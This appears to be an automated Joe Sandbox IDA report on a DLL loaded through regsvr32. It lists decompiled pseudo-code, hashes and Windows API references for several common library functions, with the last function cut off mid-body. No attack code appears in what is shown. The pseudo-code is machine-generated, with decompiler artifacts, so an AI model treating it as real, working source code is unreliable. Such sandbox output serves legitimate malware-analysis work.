Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: cc62f1fac42665efd7186574a6d3868d89f04d114cdaa46c04caf2bef036d7e9
Instruction ID: 93ccbe7080ab29872f2002451eddf122bb5c7ca47fb05f85a5ecfca81303399d
Opcode Fuzzy Hash: cc62f1fac42665efd7186574a6d3868d89f04d114cdaa46c04caf2bef036d7e9
Instruction Fuzzy Hash: B251BE3590161AEBDB21CF99DC89EDF7FF8FB49750F50411AF514A2250D3319A51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10022358 Relevance: 9.1, APIs: 6, Instructions: 117
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E10022358(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x10080af8);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x1009518c;
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_a20 =  *0x1009505c;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E1001B2B0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E1001AB60(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x1009504c;
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x10080700, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x100806fc, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x1009518c = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x1002235b
0x1002235d
0x10022362
0x1002236d
0x1002236e
0x10022375
0x1002237b
0x1002237e
0x10022387
0x100223c7
0x100223ca
0x100223f3
0x00000000
0x100223f9
0x100223fc
0x10022403
0x10022403
0x10022413
0x1002241d
0x10022423
0x10022428
0x00000000
0x1002242a
0x1002242a
0x10022437
0x1002243c
0x1002243f
0x10022441
0x10022447
0x1002245c
0x10022462
0x00000000
0x10022464
0x10022473
0x1002247b
0x00000000
0x1002247d
0x10022485
0x10022485
0x1002247b
0x10022462
0x10022428
0x100223cc
0x100223cc
0x100223d1
0x100223d3
0x100223d3
0x100223e5
0x100223e5
0x10022389
0x1002238c
0x1002238f
0x1002239f
0x100223b9
0x1002248d
0x1002248d
0x100223bf
0x100223c1
0x00000000
0x100223c1
0x100223a1
0x100223a1
0x100223c2
0x100223c2
0x00000000
0x100223c2
0x1002239f
0x10022495
0x100224a0

APIs

GetStringTypeW.KERNEL32(00000001,10080700,00000001,00000000,?,00000100,00000000,1001C6E1,00000001,00000020,00000100,?,00000000), ref: 10022397
GetStringTypeA.KERNEL32(00000000,00000001,100806FC,00000001,?), ref: 100223B1
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,1001C6E1,00000001,00000020,00000100,?,00000000), ref: 100223E5
MultiByteToWideChar.KERNEL32(1001C6E1,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,1001C6E1,00000001,00000020,00000100,?,00000000), ref: 1002241D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 10022473
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 10022485

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 33feb5e25fe3463824d4ed74a1e031dd6c7fcc69fb6bbe7b8e9d6dd96f8a2f27
Instruction ID: ca757afce2ab82f7a3dbc70c1945fbfed463c9d29303216e4653f64829791cd7
Opcode Fuzzy Hash: 33feb5e25fe3463824d4ed74a1e031dd6c7fcc69fb6bbe7b8e9d6dd96f8a2f27
Instruction Fuzzy Hash: 1741BA72A0022AFFDF10DFA9DC85EEE3BB8FB09350F504526FA15D6250C7358A508BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10063CBD Relevance: 9.1, APIs: 6, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10063CBD(intOrPtr __ecx, void* __esi) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t58;
				signed int _t59;
				signed int _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t88;
				CHAR** _t90;
				void* _t91;

				E1001A9E0(0x10076de4, _t91);
				_t84 = __ecx;
				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
				_t51 = E10063DF6(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
				if(_t51 == 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t51;
				}
				_t97 =  *((intOrPtr*)(_t91 + 8));
				 *((intOrPtr*)(_t91 - 0x18)) = 1;
				if( *((intOrPtr*)(_t91 + 8)) == 0) {
					L18:
					E10063ECA(_t84, 1, 1);
					_t51 =  *((intOrPtr*)(_t91 - 0x18));
					goto L19;
				}
				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
				_push(0);
				_t88 = _t53;
				L1004F671(_t91 - 0x38, _t97);
				 *(_t91 - 4) = 0;
				 *(_t91 - 0x14) = 0;
				if(_t88 != 0) {
					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
				}
				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
				 *(_t91 - 0x10) = 0;
				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
					L15:
					if( *(_t91 - 0x14) != 0) {
						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
					}
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					L1004F6E3(_t91 - 0x38,  *(_t91 - 4));
					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
					goto L18;
				} else {
					_t90 = _t86 + 0x10;
					do {
						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
						_t100 = _t58;
						 *_t86 = _t58;
						if(_t58 == 0) {
							_t59 = GetSystemMetrics(0);
							asm("cdq");
							_t77 = 4;
							__eflags =  *(_t91 - 0x10);
							 *(_t90 - 0xc) = _t59 / _t77;
							if(__eflags == 0) {
								_t33 = _t90 - 8;
								 *_t33 =  *(_t90 - 8) | 0x08000100;
								__eflags =  *_t33;
							}
							goto L12;
						}
						if(E100478EF(_t90, _t100, _t58) == 0) {
							L14:
							 *((intOrPtr*)(_t91 - 0x18)) = 0;
							goto L15;
						}
						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
						 *(_t90 - 0xc) =  *(_t91 - 0x24);
						_push(0);
						_push( *_t90);
						_push( *(_t91 - 0x10));
						if(L10053F1D( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
							goto L14;
						}
						L12:
						_t86 = _t86 + 0x14;
						_t90 =  &(_t90[5]);
						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
					goto L15;
				}
			}

0x10063cc2
0x10063cd0
0x10063cd2
0x10063cd5
0x10063cdc
0x10063de7
0x10063deb
0x10063df3
0x10063df3
0x10063ce5
0x10063ce8
0x10063cef
0x10063dd8
0x10063dde
0x10063de3
0x00000000
0x10063de6
0x10063cfd
0x10063d03
0x10063d07
0x10063d09
0x10063d10
0x10063d13
0x10063d16
0x10063d22
0x10063d22
0x10063d28
0x10063d2b
0x10063d2e
0x10063db7
0x10063dbb
0x10063dc3
0x10063dc3
0x10063dc9
0x10063dd0
0x10063dd5
0x00000000
0x10063d34
0x10063d34
0x10063d37
0x10063d3a
0x10063d3e
0x10063d40
0x10063d44
0x10063d46
0x10063d48
0x10063d86
0x10063d8e
0x10063d8f
0x10063d92
0x10063d95
0x10063d98
0x10063d9a
0x10063d9a
0x10063d9a
0x10063d9a
0x00000000
0x10063d98
0x10063d54
0x10063db4
0x10063db4
0x00000000
0x10063db4
0x10063d64
0x10063d70
0x10063d75
0x10063d76
0x10063d77
0x10063d81
0x00000000
0x00000000
0x10063da1
0x10063da1
0x10063da4
0x10063da7
0x10063dad
0x00000000
0x10063db2

APIs

__EH_prolog.LIBCMT ref: 10063CC2
SendMessageA.USER32 ref: 10063CFD
SelectObject.GDI32(00000014,00000000), ref: 10063D1C
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 10063D64
GetSystemMetrics.USER32 ref: 10063D86
SelectObject.GDI32(00000014,?), ref: 10063DC3

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ObjectSelect$ExtentH_prologMessageMetricsPoint32SendSystemText
String ID:
API String ID: 927636252-0
Opcode ID: deccb9d6786fd28873b6c7504364510d2646918fd70a21c8400a5d5d017f4caf
Instruction ID: fad944eb98f27aff5a3d7a4996ff1c808c36c9978e8e2d7eb483999daa812cc5
Opcode Fuzzy Hash: deccb9d6786fd28873b6c7504364510d2646918fd70a21c8400a5d5d017f4caf
Instruction Fuzzy Hash: 7D418AB590021AEFDB05DF94D8859AEFBB6FF08354F11802AF906A3250D771AE40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100653A8 Relevance: 9.1, APIs: 6, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E100653A8(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t39;
				signed int* _t45;
				void* _t58;
				long* _t61;

				_push(__ecx);
				_t61 = __ecx;
				_t58 = TlsGetValue( *__ecx);
				if(_t58 == 0) {
					_t28 = E1006516E(0x10);
					if(_t28 == 0) {
						_t58 = 0;
					} else {
						 *_t28 = 0x1007e164;
						_t58 = _t28;
					}
					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
					_t8 = _t58 + 8; // 0x8
					_t45 = _t8;
					_t9 =  &(_t61[7]); // 0x10094e64
					_v8 = _t58;
					EnterCriticalSection(_t9);
					_t11 =  &(_t61[5]); // 0x10094e5c
					_t48 = _t11;
					E10065115(_t11, _t58);
					_t12 =  &(_t61[7]); // 0x10094e64
					LeaveCriticalSection(_t12);
					goto L8;
				} else {
					_t2 = _t58 + 8; // 0x8
					_t45 = _t2;
					if(_a4 >=  *_t45 && _a8 != 0) {
						L8:
						_t32 =  *(_t58 + 0xc);
						if(_t32 != 0) {
							_t15 =  &(_t61[3]); // 0x3
							_t48 =  *_t15 << 2;
							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t61[3]); // 0x3
							_t33 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t58 + 0xc) = _t33;
						if(_t33 == 0) {
							E1003743B(_t48);
						}
						_t17 =  &(_t61[3]); // 0x3
						E1001AB60( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t61[3]); // 0x3
						 *_t45 =  *_t21;
						TlsSetValue( *_t61, _t58);
					}
				}
				_t39 =  *(_t58 + 0xc);
				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
				return _t39;
			}

0x100653ab
0x100653ae
0x100653b9
0x100653bd
0x100653db
0x100653e2
0x100653ee
0x100653e4
0x100653e4
0x100653ea
0x100653ea
0x100653f0
0x100653f4
0x100653f8
0x100653f8
0x100653fb
0x100653ff
0x10065402
0x10065409
0x10065409
0x1006540c
0x10065411
0x10065415
0x00000000
0x100653bf
0x100653c2
0x100653c2
0x100653c7
0x1006541b
0x1006541b
0x10065420
0x10065433
0x10065438
0x1006543d
0x10065422
0x10065422
0x1006542b
0x1006542b
0x10065445
0x10065448
0x1006544a
0x1006544a
0x10065459
0x10065469
0x1006546e
0x10065474
0x10065479
0x10065479
0x100653c7
0x1006547f
0x1006548a
0x1006548f

APIs

TlsGetValue.KERNEL32 ref: 100653B3
EnterCriticalSection.KERNEL32(10094E64,00000010,?,10065651,10094918,00000000,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 10065402
LeaveCriticalSection.KERNEL32(10094E64,00000000,?,10065651,10094918,00000000,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 10065415
LocalAlloc.KERNEL32(00000000,00000003,?,10065651,10094918,00000000,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 1006542B
LocalReAlloc.KERNEL32(?,00000003,00000002,?,10065651,10094918,00000000,?,?,10064B9A,10062AFA,10064BB6,10041F16,?,10041F81,00000001), ref: 1006543D
TlsSetValue.KERNEL32(10094E48,00000000,?,?,?,?,?), ref: 10065479

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: a1cb6c45a690288c653e6892526a41b873bc3f87ceb2afefd165e3f2f3f55042
Instruction ID: 05f5966d0d87fc2c26c719eb9ddf5560732b4ee48dfbc26b82c3b45fe053ce1b
Opcode Fuzzy Hash: a1cb6c45a690288c653e6892526a41b873bc3f87ceb2afefd165e3f2f3f55042
Instruction Fuzzy Hash: 67317A31100616EFE724CF68C88AF5AB7E9FB44766F008619E96A87250DB71E944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002D550 Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002D550(void* __eflags, struct HWND__* _a4, struct HDC__* _a8, struct tagRECT* _a12, signed int _a16) {
				CHAR* _v8;
				long _v12;
				void* _v24;
				long _t30;
				long _t36;
				int _t38;
				signed short _t40;
				struct HWND__* _t50;
				signed int _t51;
				signed int _t52;
				struct tagRECT* _t53;
				CHAR* _t54;

				_t53 = _a12;
				PatBlt(_a8, _t53->left, _t53->top, _t53->right - _t53->left, _t53->bottom - _t53->top, 0xf00021);
				_t50 = _a4;
				_t38 = GetWindowTextLengthA(_t50);
				_t30 = E1001B2B0(_t26 + 8 & 0xfffffffc, _a8);
				_v8 = _t54;
				if(_v8 != 0) {
					_t30 = GetWindowTextA(_t50, _v8, _t38 + 2);
					if(_t30 != 0) {
						_t40 = 0x140;
						_t51 = _a16;
						if((_t51 & 0x0000000f) != 0xc) {
							_t40 = _t51 & 0x0000000f | 0x00000150;
						}
						if((_t51 & 0x00000080) != 0) {
							_t40 = _t40 | 0x00000008;
						}
						_t52 = _t51 & 0x08000000;
						if(_t52 != 0) {
							_t36 =  *0x10096d5c; // 0x0
							_v12 = SetTextColor(_a8, _t36);
						}
						_t30 = DrawTextA(_a8, _v8, 0xffffffff, _t53, _t40 & 0x0000ffff);
						if(_t52 != 0) {
							_t30 = SetTextColor(_a8, _v12);
						}
					}
				}
				return _t30;
			}

0x1002d559
0x1002d578
0x1002d57e
0x1002d588
0x1002d593
0x1002d598
0x1002d59f
0x1002d5aa
0x1002d5b2
0x1002d5b4
0x1002d5b8
0x1002d5c1
0x1002d5c9
0x1002d5c9
0x1002d5d4
0x1002d5d6
0x1002d5d6
0x1002d5d9
0x1002d5df
0x1002d5e1
0x1002d5f1
0x1002d5f1
0x1002d603
0x1002d60b
0x1002d615
0x1002d615
0x1002d60b
0x1002d5b2
0x1002d624

APIs

PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 1002D578
GetWindowTextLengthA.USER32 ref: 1002D582
GetWindowTextA.USER32(?,00000000,00000000), ref: 1002D5AA
SetTextColor.GDI32(?,00000000), ref: 1002D5EB
DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 1002D603
SetTextColor.GDI32(?,?), ref: 1002D615

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Text$ColorWindow$DrawLength
String ID:
API String ID: 1177705772-0
Opcode ID: eee3240be8d5dd16f7d482da94814229cd2e1f54c1c04c2e3e49616ace3c2efd
Instruction ID: ac89c0dc9c43174d9fe1bcdf0e673aaf9c9483675d9503c3e5ae45ff4809ffd5
Opcode Fuzzy Hash: eee3240be8d5dd16f7d482da94814229cd2e1f54c1c04c2e3e49616ace3c2efd
Instruction Fuzzy Hash: D0218E76600619AFD704DF68DD88EBA77B9FB89321F14810AFD5987390DA30ED00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10042DFC Relevance: 9.1, APIs: 6, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E10042DFC(intOrPtr* __ecx, void* __edx, void* __edi) {
				struct HWND__* _t33;
				int _t35;
				void* _t37;
				void* _t52;
				void* _t53;
				intOrPtr* _t57;
				void* _t58;
				void* _t60;

				_t53 = __edi;
				_t52 = __edx;
				E1001A9E0(0x10076568, _t60);
				_push(__ecx);
				_t57 = __ecx;
				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E10064B8B() + 4));
				E10064B8B();
				E10040D20();
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
					 *((intOrPtr*)( *_t57 + 0xf0))();
				}
				_push(_t53);
				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
				E100438C2(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t48 = _t57;
				_t58 = E100436AB(_t57);
				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
				E100438C2(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
				_t33 = GetCapture();
				if(_t33 != 0) {
					SendMessageA(_t33, 0x1f, 0, 0);
				}
				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
				_t65 = _t35;
				if(_t35 == 0) {
					_push(0xffffffff);
